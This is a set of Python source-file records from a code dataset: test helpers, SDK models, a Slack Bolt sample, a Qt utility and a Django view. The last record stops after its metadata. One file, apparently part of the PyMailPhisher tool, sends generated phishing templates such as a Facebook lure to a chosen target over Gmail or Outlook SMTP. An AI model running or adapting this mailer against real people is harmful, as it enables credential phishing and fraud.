Dataset schema (one row per source file):
hexsha: string (length 40)
size: int64 (1 to 1.03M)
ext: string (10 classes)
lang: string (1 class)
max_stars_repo_path: string (length 3 to 239)
max_stars_repo_name: string (length 5 to 130)
max_stars_repo_head_hexsha: string (length 40 to 78)
max_stars_repo_licenses: list (length 1 to 10)
max_stars_count: int64 (1 to 191k, nullable)
max_stars_repo_stars_event_min_datetime: string (length 24, nullable)
max_stars_repo_stars_event_max_datetime: string (length 24, nullable)
max_issues_repo_path: string (length 3 to 239)
max_issues_repo_name: string (length 5 to 130)
max_issues_repo_head_hexsha: string (length 40 to 78)
max_issues_repo_licenses: list (length 1 to 10)
max_issues_count: int64 (1 to 67k, nullable)
max_issues_repo_issues_event_min_datetime: string (length 24, nullable)
max_issues_repo_issues_event_max_datetime: string (length 24, nullable)
max_forks_repo_path: string (length 3 to 239)
max_forks_repo_name: string (length 5 to 130)
max_forks_repo_head_hexsha: string (length 40 to 78)
max_forks_repo_licenses: list (length 1 to 10)
max_forks_count: int64 (1 to 105k, nullable)
max_forks_repo_forks_event_min_datetime: string (length 24, nullable)
max_forks_repo_forks_event_max_datetime: string (length 24, nullable)
content: string (length 1 to 1.03M)
avg_line_length: float64 (1 to 958k)
max_line_length: int64 (1 to 1.03M)
alphanum_fraction: float64 (0 to 1)
hexsha: 4a1b2d3eb231f1084cbb9fe483ad06184b53119e | size: 9,884 | ext: py | lang: Python
max_stars: tests/parameterized.py @ QDucasse/PySOM (0b8801838a8902894dd606c0f84f1dcde79061d8) | licenses: ["MIT"] | stars: 1 | 2020-10-06T13:57:43.000Z to 2020-10-06T13:57:43.000Z
max_issues: tests/parameterized.py @ QDucasse/PySOM (0b8801838a8902894dd606c0f84f1dcde79061d8) | licenses: ["MIT"] | issues: null
max_forks: tests/parameterized.py @ QDucasse/PySOM (0b8801838a8902894dd606c0f84f1dcde79061d8) | licenses: ["MIT"] | forks: null
content:
# Source: https://github.com/wolever/nose-parameterized
# commit 0da3a2f0325c17858a5f5f1fdf1939520ce85e48, Aug 25, 2013
# Stefan: I removed the dependency on the six module, don't need the portability, now.
#
# tl;dr: all code is licensed under simplified BSD, unless stated otherwise.
#
# Unless stated otherwise in the source files, all code is copyright 2010 David
# Wolever <david@wolever.net>. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL <COPYRIGHT HOLDER> OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of David Wolever.
import inspect
import re
from collections import namedtuple
from functools import wraps
from unittest import TestCase
import new
from nose.tools import nottest
new_instancemethod = new.instancemethod
_param = namedtuple("param", "args kwargs")
class param(_param):
""" Represents a single parameter to a test case.
For example::
>>> p = param("foo", bar=16)
>>> p
param("foo", bar=16)
>>> p.args
('foo', )
>>> p.kwargs
{'bar': 16}
Intended to be used as an argument to ``@parameterized``::
@parameterized([
param("foo", bar=16),
])
def test_stuff(foo, bar=16):
pass
"""
def __new__(cls, *args, **kwargs):
return _param.__new__(cls, args, kwargs)
@classmethod
def explicit(cls, args=None, kwargs=None):
""" Creates a ``param`` by explicitly specifying ``args`` and
``kwargs``::
>>> param.explicit([1,2,3])
param(*(1, 2, 3))
>>> param.explicit(kwargs={"foo": 42})
param(*(), **{"foo": "42"})
"""
args = args or ()
kwargs = kwargs or {}
return cls(*args, **kwargs)
@classmethod
def from_decorator(cls, args):
""" Returns an instance of ``param()`` for ``@parameterized`` argument
``args``::
>>> param.from_decorator((42, ))
param(args=(42, ), kwargs={})
>>> param.from_decorator("foo")
param(args=("foo", ), kwargs={})
"""
if isinstance(args, param):
return args
if isinstance(args, basestring):
args = (args,)
return cls(*args)
def __repr__(self):
return "param(*%r, **%r)" % self
class parameterized(object):
""" Parameterize a test case::
class TestInt(object):
@parameterized([
("A", 10),
("F", 15),
param("10", 42, base=42)
])
def test_int(self, input, expected, base=16):
actual = int(input, base=base)
assert_equal(actual, expected)
@parameterized([
(2, 3, 5),
(3, 5, 8),
])
def test_add(a, b, expected):
assert_equal(a + b, expected)
"""
def __init__(self, input):
self.get_input = self.input_as_callable(input)
def __call__(self, test_func):
self.assert_not_in_testcase_subclass()
@wraps(test_func)
def parameterized_helper_method(test_self=None):
f = test_func
if test_self is not None:
# If we are a test method (which we suppose to be true if we
# are being passed a "self" argument), we first need to create
# an instance method, attach it to the instance of the test
# class, then pull it back off to turn it into a bound method.
# If we don't do this, Nose gets cranky.
f = self.make_bound_method(test_self, test_func)
# Note: because nose is so very picky, the more obvious
# ``return self.yield_nose_tuples(f)`` won't work here.
for nose_tuple in self.yield_nose_tuples(f):
yield nose_tuple
test_func.__name__ = "_helper_for_%s" % (test_func.__name__,)
parameterized_helper_method.parameterized_input = input
parameterized_helper_method.parameterized_func = test_func
return parameterized_helper_method
def yield_nose_tuples(self, func):
for args in self.get_input():
p = param.from_decorator(args)
# ... then yield that as a tuple. If those steps aren't
# followed precisely, Nose gets upset and doesn't run the test
# or doesn't run setup methods.
yield self.param_as_nose_tuple(p, func)
def param_as_nose_tuple(self, p, func):
nose_func = func
nose_args = p.args
if p.kwargs:
nose_func = wraps(func)(lambda args, kwargs: func(*args, **kwargs))
nose_args = (p.args, p.kwargs)
return (nose_func,) + nose_args
def make_bound_method(self, instance, func):
cls = type(instance)
im_f = new_instancemethod(func, None, cls)
setattr(cls, func.__name__, im_f)
return getattr(instance, func.__name__)
def assert_not_in_testcase_subclass(self):
parent_classes = self._terrible_magic_get_defining_classes()
if any(issubclass(cls, TestCase) for cls in parent_classes):
raise Exception("Warning: '@parameterized' tests won't work "
"inside subclasses of 'TestCase' - use "
"'@parameterized.expand' instead")
def _terrible_magic_get_defining_classes(self):
""" Returns the set of parent classes of the class currently being defined.
Will likely only work if called from the ``parameterized`` decorator.
This function is entirely @brandon_rhodes's fault, as he suggested
the implementation: http://stackoverflow.com/a/8793684/71522
"""
stack = inspect.stack()
if len(stack) <= 4:
return []
frame = stack[4]
code_context = frame[4] and frame[4][0].strip()
if not (code_context and code_context.startswith("class ")):
return []
_, parents = code_context.split("(", 1)
parents, _ = parents.rsplit(")", 1)
return eval("[" + parents + "]", frame[0].f_globals, frame[0].f_locals)
@classmethod
def input_as_callable(cls, input):
if callable(input):
return lambda: cls.check_input_values(input())
input_values = cls.check_input_values(input)
return lambda: input_values
@classmethod
def check_input_values(cls, input_values):
if not hasattr(input_values, "__iter__"):
raise ValueError("expected iterable input; got %r" % (input_values,))
return input_values
@classmethod
def expand(cls, input):
""" A "brute force" method of parameterizing test cases. Creates new
test cases and injects them into the namespace that the wrapped
function is being defined in. Useful for parameterizing tests in
subclasses of 'UnitTest', where Nose test generators don't work.
>>> @parameterized.expand([("foo", 1, 2)])
... def test_add1(name, input, expected):
... actual = add1(input)
... assert_equal(actual, expected)
...
>>> locals()
... 'test_add1_foo_0': <function ...> ...
>>>
"""
def parameterized_expand_wrapper(f):
stack = inspect.stack()
frame = stack[1]
frame_locals = frame[0].f_locals
base_name = f.__name__
get_input = cls.input_as_callable(input)
for num, args in enumerate(get_input()):
p = param.from_decorator(args)
name_suffix = "_%s" % (num,)
if len(p.args) > 0 and isinstance(p.args[0], basestring):
name_suffix += "_" + cls.to_safe_name(p.args[0])
name = base_name + name_suffix
frame_locals[name] = cls.param_as_standalone_func(p, f, name)
return nottest(f)
return parameterized_expand_wrapper
@classmethod
def param_as_standalone_func(cls, p, func, name):
standalone_func = lambda *a: func(*(a + p.args), **p.kwargs)
standalone_func.__name__ = name
return standalone_func
@classmethod
def to_safe_name(cls, s):
return str(re.sub("[^a-zA-Z0-9_]", "", s))
avg_line_length: 38.310078 | max_line_length: 86 | alphanum_fraction: 0.600668
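For illustration only, a minimal sketch of how the `parameterized.expand` helper defined above is meant to be used inside a `unittest.TestCase` subclass (the plain `@parameterized` decorator explicitly refuses to run there). The `add1` function and test class are hypothetical, and the sketch assumes the nose-era Python 2 environment this vendored module targets:

import unittest
from parameterized import parameterized  # i.e. the module shown above

def add1(x):
    return x + 1

class TestAdd1(unittest.TestCase):
    # expand() injects one standalone test function per parameter set into the
    # class namespace at definition time (names like test_add1_0_two,
    # test_add1_1_ten), which is how the cases become visible to the runner.
    @parameterized.expand([
        ("two", 1, 2),
        ("ten", 9, 10),
    ])
    def test_add1(self, name, value, expected):
        self.assertEqual(add1(value), expected)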
hexsha: 4a1b2e0eb2f9435bab1be938b7722f886c62447b | size: 5,505 | ext: py | lang: Python
max_stars: 3.7.0/lldb-3.7.0.src/test/lang/cpp/stl/TestSTL.py @ androm3da/clang_sles (2ba6d0711546ad681883c42dfb8661b842806695) | licenses: ["MIT"] | stars: 3 | 2016-02-10T14:18:40.000Z to 2018-02-05T03:15:56.000Z
max_issues: 3.7.0/lldb-3.7.0.src/test/lang/cpp/stl/TestSTL.py @ androm3da/clang_sles (2ba6d0711546ad681883c42dfb8661b842806695) | licenses: ["MIT"] | issues: 1 | 2016-02-10T15:40:03.000Z to 2016-02-10T15:40:03.000Z
max_forks: 3.7.0/lldb-3.7.0.src/test/lang/cpp/stl/TestSTL.py @ androm3da/clang_sles (2ba6d0711546ad681883c42dfb8661b842806695) | licenses: ["MIT"] | forks: null
content:
"""
Test some expressions involving STL data types.
"""
import os, time
import unittest2
import lldb
import lldbutil
from lldbtest import *
class STLTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
# rdar://problem/10400981
@unittest2.expectedFailure
@skipUnlessDarwin
@dsym_test
def test_with_dsym(self):
"""Test some expressions involving STL data types."""
self.buildDsym()
self.step_stl_exprs()
# rdar://problem/10400981
@unittest2.expectedFailure
@dwarf_test
def test_with_dwarf(self):
"""Test some expressions involving STL data types."""
self.buildDwarf()
self.step_stl_exprs()
@python_api_test
@dsym_test
@skipUnlessDarwin
def test_SBType_template_aspects_with_dsym(self):
"""Test APIs for getting template arguments from an SBType."""
self.buildDsym()
self.sbtype_template_apis()
@expectedFailureIcc # icc 13.1 and 14-beta do not emit DW_TAG_template_type_parameter
@python_api_test
@dwarf_test
def test_SBType_template_aspects_with_dwarf(self):
"""Test APIs for getting template arguments from an SBType."""
self.buildDwarf()
self.sbtype_template_apis()
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.cpp'
self.line = line_number(self.source, '// Set break point at this line.')
def step_stl_exprs(self):
"""Test some expressions involving STL data types."""
exe = os.path.join(os.getcwd(), "a.out")
# The following two lines, if uncommented, will enable loggings.
#self.ci.HandleCommand("log enable -f /tmp/lldb.log lldb default", res)
#self.assertTrue(res.Succeeded())
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# rdar://problem/8543077
# test/stl: clang built binaries results in the breakpoint locations = 3,
# is this a problem with clang generated debug info?
lldbutil.run_break_set_by_file_and_line (self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# Stop at 'std::string hello_world ("Hello World!");'.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['main.cpp:%d' % self.line,
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs = [' resolved, hit count = 1'])
# Now try some expressions....
self.runCmd('expr for (int i = 0; i < hello_world.length(); ++i) { (void)printf("%c\\n", hello_world[i]); }')
# rdar://problem/10373783
# rdar://problem/10400981
self.expect('expr associative_array.size()',
substrs = [' = 3'])
self.expect('expr associative_array.count(hello_world)',
substrs = [' = 1'])
self.expect('expr associative_array[hello_world]',
substrs = [' = 1'])
self.expect('expr associative_array["hello"]',
substrs = [' = 2'])
def sbtype_template_apis(self):
"""Test APIs for getting template arguments from an SBType."""
exe = os.path.join(os.getcwd(), 'a.out')
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple (None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# Get Frame #0.
self.assertTrue(process.GetState() == lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)
self.assertTrue(thread.IsValid(), "There should be a thread stopped due to breakpoint condition")
frame0 = thread.GetFrameAtIndex(0)
# Get the type for variable 'associative_array'.
associative_array = frame0.FindVariable('associative_array')
self.DebugSBValue(associative_array)
self.assertTrue(associative_array, VALID_VARIABLE)
map_type = associative_array.GetType()
self.DebugSBType(map_type)
self.assertTrue(map_type, VALID_TYPE)
num_template_args = map_type.GetNumberOfTemplateArguments()
self.assertTrue(num_template_args > 0)
# We expect the template arguments to contain at least 'string' and 'int'.
expected_types = { 'string': False, 'int': False }
for i in range(num_template_args):
t = map_type.GetTemplateArgumentType(i)
self.DebugSBType(t)
self.assertTrue(t, VALID_TYPE)
name = t.GetName()
if 'string' in name:
expected_types['string'] = True
elif 'int' == name:
expected_types['int'] = True
# Check that both entries of the dictionary have 'True' as the value.
self.assertTrue(all(expected_types.values()))
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
avg_line_length: 36.946309 | max_line_length: 119 | alphanum_fraction: 0.64614

hexsha: 4a1b2f3cef995f9d33e0e9f7610186eaa6d67d4d | size: 2,405 | ext: py | lang: Python
max_stars: azure/mgmt/sql/models/metric_definition.py @ EnjoyLifeFund/macHighSierra-py36-pkgs (5668b5785296b314ea1321057420bcd077dba9ea) | licenses: ["BSD-3-Clause", "BSD-2-Clause", "MIT"] | stars: 1 | 2022-01-25T22:52:58.000Z to 2022-01-25T22:52:58.000Z
max_issues: azure/mgmt/sql/models/metric_definition.py @ EnjoyLifeFund/Debian_py36_packages (1985d4c73fabd5f08f54b922e73a9306e09c77a5) | licenses: ["BSD-3-Clause", "BSD-2-Clause", "MIT"] | issues: null
max_forks: azure/mgmt/sql/models/metric_definition.py @ EnjoyLifeFund/Debian_py36_packages (1985d4c73fabd5f08f54b922e73a9306e09c77a5) | licenses: ["BSD-3-Clause", "BSD-2-Clause", "MIT"] | forks: null
content:
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class MetricDefinition(Model):
"""A database metric definition.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: The name information for the metric.
:vartype name: ~azure.mgmt.sql.models.MetricName
:ivar primary_aggregation_type: The primary aggregation type defining how
metric values are displayed. Possible values include: 'None', 'Average',
'Count', 'Minimum', 'Maximum', 'Total'
:vartype primary_aggregation_type: str or
~azure.mgmt.sql.models.PrimaryAggregationType
:ivar resource_uri: The resource uri of the database.
:vartype resource_uri: str
:ivar unit: The unit of the metric. Possible values include: 'Count',
'Bytes', 'Seconds', 'Percent', 'CountPerSecond', 'BytesPerSecond'
:vartype unit: str or ~azure.mgmt.sql.models.UnitDefinitionType
:ivar metric_availabilities: The list of database metric availabities for
the metric.
:vartype metric_availabilities:
list[~azure.mgmt.sql.models.MetricAvailability]
"""
_validation = {
'name': {'readonly': True},
'primary_aggregation_type': {'readonly': True},
'resource_uri': {'readonly': True},
'unit': {'readonly': True},
'metric_availabilities': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'MetricName'},
'primary_aggregation_type': {'key': 'primaryAggregationType', 'type': 'str'},
'resource_uri': {'key': 'resourceUri', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'metric_availabilities': {'key': 'metricAvailabilities', 'type': '[MetricAvailability]'},
}
def __init__(self):
self.name = None
self.primary_aggregation_type = None
self.resource_uri = None
self.unit = None
self.metric_availabilities = None
avg_line_length: 39.42623 | max_line_length: 97 | alphanum_fraction: 0.633264

hexsha: 4a1b30dd7a5e6b92c805d76d767f7a3537160530 | size: 1,346 | ext: py | lang: Python
max_stars: samples/bottle/oauth_app.py @ misscoded/bolt-python (ed26ea039c37cbd00551e25deac0fb1871c03aed) | licenses: ["MIT"] | stars: 1 | 2020-11-11T19:19:20.000Z to 2020-11-11T19:19:20.000Z
max_issues: samples/bottle/oauth_app.py @ misscoded/bolt-python (ed26ea039c37cbd00551e25deac0fb1871c03aed) | licenses: ["MIT"] | issues: null
max_forks: samples/bottle/oauth_app.py @ misscoded/bolt-python (ed26ea039c37cbd00551e25deac0fb1871c03aed) | licenses: ["MIT"] | forks: null
content:
# ------------------------------------------------
# instead of slack_bolt in requirements.txt
import sys
sys.path.insert(1, "../../src")
# ------------------------------------------------
import logging
from slack_bolt import App
from slack_bolt.adapter.bottle import SlackRequestHandler
logging.basicConfig(level=logging.DEBUG)
app = App()
@app.middleware # or app.use(log_request)
def log_request(logger, payload, next):
logger.debug(payload)
return next()
@app.event("app_mention")
def event_test(ack, payload, say, logger):
logger.info(payload)
say("What's up?")
from bottle import get, post, request, response, run
handler = SlackRequestHandler(app)
@post("/slack/events")
def slack_events():
return handler.handle(request, response)
@get("/slack/install")
def install():
return handler.handle(request, response)
@get("/slack/oauth_redirect")
def oauth_redirect():
return handler.handle(request, response)
if __name__ == "__main__":
run(host="0.0.0.0", port=3000, reloader=True)
# pip install -r requirements.txt
# # -- OAuth flow -- #
# export SLACK_SIGNING_SECRET=***
# export SLACK_BOT_TOKEN=xoxb-***
# export SLACK_CLIENT_ID=111.111
# export SLACK_CLIENT_SECRET=***
# export SLACK_SCOPES=app_mentions:read,chat:write
# FLASK_APP=oauth_app.py FLASK_ENV=development flask run -p 3000
avg_line_length: 22.065574 | max_line_length: 64 | alphanum_fraction: 0.675334
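As a point of comparison with the OAuth-flow environment variables listed in the sample above, a hedged sketch of the simpler single-workspace setup that slack_bolt also supports; it assumes SLACK_BOT_TOKEN and SLACK_SIGNING_SECRET are exported and keeps only the events endpoint:

import os
from bottle import post, request, response, run
from slack_bolt import App
from slack_bolt.adapter.bottle import SlackRequestHandler

# Explicit bot token + signing secret instead of the OAuth client settings.
app = App(
    token=os.environ["SLACK_BOT_TOKEN"],
    signing_secret=os.environ["SLACK_SIGNING_SECRET"],
)
handler = SlackRequestHandler(app)

@post("/slack/events")
def slack_events():
    # Event payloads still flow through the same Bolt request handler.
    return handler.handle(request, response)

if __name__ == "__main__":
    run(host="0.0.0.0", port=3000)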
hexsha: 4a1b31b37195c7991e5e0456dbabde351a90acfb | size: 1,059 | ext: py | lang: Python
max_stars: qt_multiprocessing/close_app_helper.py @ justengel/qt_multiprocessing (0cae9797a6ec21128313376222325ef40ec53d75) | licenses: ["MIT"] | stars: 21 | 2018-08-14T03:46:03.000Z to 2022-02-05T19:53:25.000Z
max_issues: qt_multiprocessing/close_app_helper.py @ justengel/qt_multiprocessing (0cae9797a6ec21128313376222325ef40ec53d75) | licenses: ["MIT"] | issues: null
max_forks: qt_multiprocessing/close_app_helper.py @ justengel/qt_multiprocessing (0cae9797a6ec21128313376222325ef40ec53d75) | licenses: ["MIT"] | forks: 2 | 2018-08-14T03:39:24.000Z to 2021-08-18T02:00:44.000Z
content:
from qtpy import QtWidgets, QtCore
__all__ = ['CloseAllFilter']
class CloseAllFilter(QtCore.QObject):
"""Event filter for closing all windows if the widget is closed."""
def eventFilter(self, receiver, event):
results = super().eventFilter(receiver, event)
if event.type() == QtCore.QEvent.Close and event.isAccepted():
# Close all top level widgets that prevent the application from quitting.
try:
QtWidgets.QApplication.instance().error_dialog.setExceptHook(False)
except (AttributeError, RuntimeError, ValueError):
pass
for win in QtWidgets.QApplication.instance().topLevelWidgets():
if win != receiver:
try:
win.close()
except (AttributeError, RuntimeError):
pass
try:
win.deleteLater()
except (AttributeError, RuntimeError):
pass
return results
avg_line_length: 36.517241 | max_line_length: 85 | alphanum_fraction: 0.558074
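A minimal usage sketch for the filter above, assuming it is installed on an application's main window so that closing that window also closes any other top-level widgets; the window names are hypothetical and the import path simply mirrors the repo layout shown in the metadata:

import sys
from qtpy import QtWidgets
from qt_multiprocessing.close_app_helper import CloseAllFilter

app = QtWidgets.QApplication(sys.argv)

main = QtWidgets.QWidget()
main.setWindowTitle("Main")
secondary = QtWidgets.QWidget()  # would normally keep the app alive on its own
secondary.setWindowTitle("Secondary")

# Keep a reference to the filter so it is not garbage collected.
close_filter = CloseAllFilter(main)
main.installEventFilter(close_filter)

main.show()
secondary.show()
sys.exit(app.exec_())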
hexsha: 4a1b31bea58b5e05b920b01d391b5d9f6fe3e83b | size: 2,957 | ext: py | lang: Python
max_stars: lib/mailer.py @ 5l1v3r1/PyMailPhisher (bfe4bf714c2cc8443dcc57c0f6c9fa5591ad1bd7) | licenses: ["Apache-2.0"] | stars: null
max_issues: lib/mailer.py @ 5l1v3r1/PyMailPhisher (bfe4bf714c2cc8443dcc57c0f6c9fa5591ad1bd7) | licenses: ["Apache-2.0"] | issues: null
max_forks: lib/mailer.py @ 5l1v3r1/PyMailPhisher (bfe4bf714c2cc8443dcc57c0f6c9fa5591ad1bd7) | licenses: ["Apache-2.0"] | forks: 2 | 2020-07-01T08:39:42.000Z to 2021-11-05T07:21:18.000Z
content:
import json
import sys
import os
import time
import smtplib
import getpass
from lib.colors import style
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Sending email
def send_mail(name, smtp_server, port):
print(style.GREEN('[+]') + style.RESET(f'-- SMTP {name} Configuration --'))
sender = str(input(style.GREEN('\n[+]') + style.RESET(' Sender email: ')))
password = getpass.getpass(style.GREEN('[+]') + style.RESET(" Sender email password: "))
receiver = str(input(style.GREEN('[+]') + style.RESET(' Receiver email: ')))
subject = str(input(style.GREEN('[+]') + style.RESET(' Email subject: ')))
files = os.listdir('Templates/Generated_Emails')
print(style.GREEN(style.RESET('\nGenerated Files:')))
for file in files:
print(style.RESET(f'- {file}'))
template = str(input(style.GREEN('\n[+]') + style.RESET('Generated file name [Eg: FacebookTemplate.html]: ')))
template_path = f'Templates/Generated_Emails/{template}'
if not os.path.exists(template_path):
print(style.RED('\n[!]') + style.RESET(' File does not exist, exiting...'))
sys.exit()
else:
None
print(style.GREEN('\n[+]') + style.RESET(f' Sending email to {receiver} ...'))
# sending the email with mime
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = receiver
read_template = open(template_path)
body = MIMEText(read_template.read(), 'html')
msg.attach(body)
mail = smtplib.SMTP(smtp_server, port)
mail.ehlo()
mail.starttls()
mail.login(sender, password)
mail.sendmail(sender, receiver, msg.as_string())
mail.quit()
print(style.GREEN('[+]') + style.RESET(" The phishing email has been sent successfully!"))
# Choosing the smtp server
def mailer():
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
print(style.RESET(" -- Choose a SMTP server --\n"))
print(style.GREEN('\n[1]') + style.RESET(' Gmail'))
print(style.GREEN('[2]') + style.RESET(' Outlook'))
print(style.GREEN('[3]') + style.RESET(' Yahoo'))
print(style.GREEN('[4]') + style.RESET(' Hotmail'))
try:
smtp_server= int(input(style.YELLOW('\n[+]') + style.RESET(' Enter mode ID: ')))
except:
print(style.RED('\n[!]') + style.RESET(' Wrong input, exiting...'))
sys.exit()
gmail_config = ['Gmail', 'smtp.gmail.com', 587]
outlook_config = ['Outlook', 'smtp-mail.outlook.com', 587]
hotmail_config = ['Hotmail', 'smtp.live.com', 465]
yahoo_config = ['Yahoo', 'smtp.mail.yahoo.com', 456]
print (u"{}[2J{}[;H".format(chr(27), chr(27))) # Clear the terminal
if smtp_server == 1:
name = gmail_config[0]
smtp_server = gmail_config[1]
port = gmail_config[2]
send_mail(name, smtp_server, port)
avg_line_length: 39.959459 | max_line_length: 115 | alphanum_fraction: 0.611769

hexsha: 4a1b324b001231c3e5d2ddc33c45ea57d244ed21 | size: 3,479 | ext: py | lang: Python
max_stars: sdk/lusid_asyncio/models/cds_seniority.py @ finbourne/lusid-sdk-python-asyncio-preview (290f93590ab5485661216c8622d3de9f7af0ed60) | licenses: ["MIT"] | stars: null
max_issues: sdk/lusid_asyncio/models/cds_seniority.py @ finbourne/lusid-sdk-python-asyncio-preview (290f93590ab5485661216c8622d3de9f7af0ed60) | licenses: ["MIT"] | issues: null
max_forks: sdk/lusid_asyncio/models/cds_seniority.py @ finbourne/lusid-sdk-python-asyncio-preview (290f93590ab5485661216c8622d3de9f7af0ed60) | licenses: ["MIT"] | forks: null
content:
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3923
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid_asyncio.configuration import Configuration
class CdsSeniority(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
allowed enum values
"""
UNKNOWN = "Unknown"
SNR = "SNR"
SUB = "SUB"
JRSUBUT2 = "JRSUBUT2"
PREFT1 = "PREFT1"
SECDOM = "SECDOM"
SNRFOR = "SNRFOR"
SUBLT2 = "SUBLT2"
allowable_values = [UNKNOWN, SNR, SUB, JRSUBUT2, PREFT1, SECDOM, SNRFOR, SUBLT2] # noqa: E501
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
}
attribute_map = {
}
required_map = {
}
def __init__(self, local_vars_configuration=None): # noqa: E501
"""CdsSeniority - a model defined in OpenAPI"
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self.discriminator = None
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CdsSeniority):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CdsSeniority):
return True
return self.to_dict() != other.to_dict()
avg_line_length: 27.393701 | max_line_length: 98 | alphanum_fraction: 0.568267

hexsha: 4a1b32594c3e7f9968a5ffe2779d0db2614fea08 | size: 451 | ext: py | lang: Python
max_stars: django_test/django_test/views.py @ AraxnoAnarxo/neu_uni_py_20 (65f8ed036fac0dc22771411933bc98362e88408c) | licenses: ["MIT"] | stars: null
max_issues: django_test/django_test/views.py @ AraxnoAnarxo/neu_uni_py_20 (65f8ed036fac0dc22771411933bc98362e88408c) | licenses: ["MIT"] | issues: null
max_forks: django_test/django_test/views.py @ AraxnoAnarxo/neu_uni_py_20 (65f8ed036fac0dc22771411933bc98362e88408c) | licenses: ["MIT"] | forks: null
content:
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
import random
from articles.models import Article, Tag
# Create your views here.
def home_page(request):
random_idx = random.randint(0, Article.objects.count() -1)
art_random = get_object_or_404(Article, id = random_idx +1)
#return HttpResponse('This is the home page')
return render(request, 'articles/index.html', {'article': art_random})
avg_line_length: 34.692308 | max_line_length: 74 | alphanum_fraction: 0.760532
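The view above assumes article IDs are contiguous and start at 1, which breaks once rows are deleted. Purely as an illustration, a sketch of a gap-tolerant variant that lets the database pick the random row, reusing the same Article model and template as above:

from django.http import Http404
from django.shortcuts import render
from articles.models import Article

def home_page(request):
    # order_by('?') returns rows in random order, so missing IDs do not matter.
    art_random = Article.objects.order_by('?').first()
    if art_random is None:
        raise Http404("No articles yet")
    return render(request, 'articles/index.html', {'article': art_random})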
hexsha: 4a1b32b6800cb879fdb60ad8efd1a0d2901c316c | size: 5,070 | ext: py | lang: Python
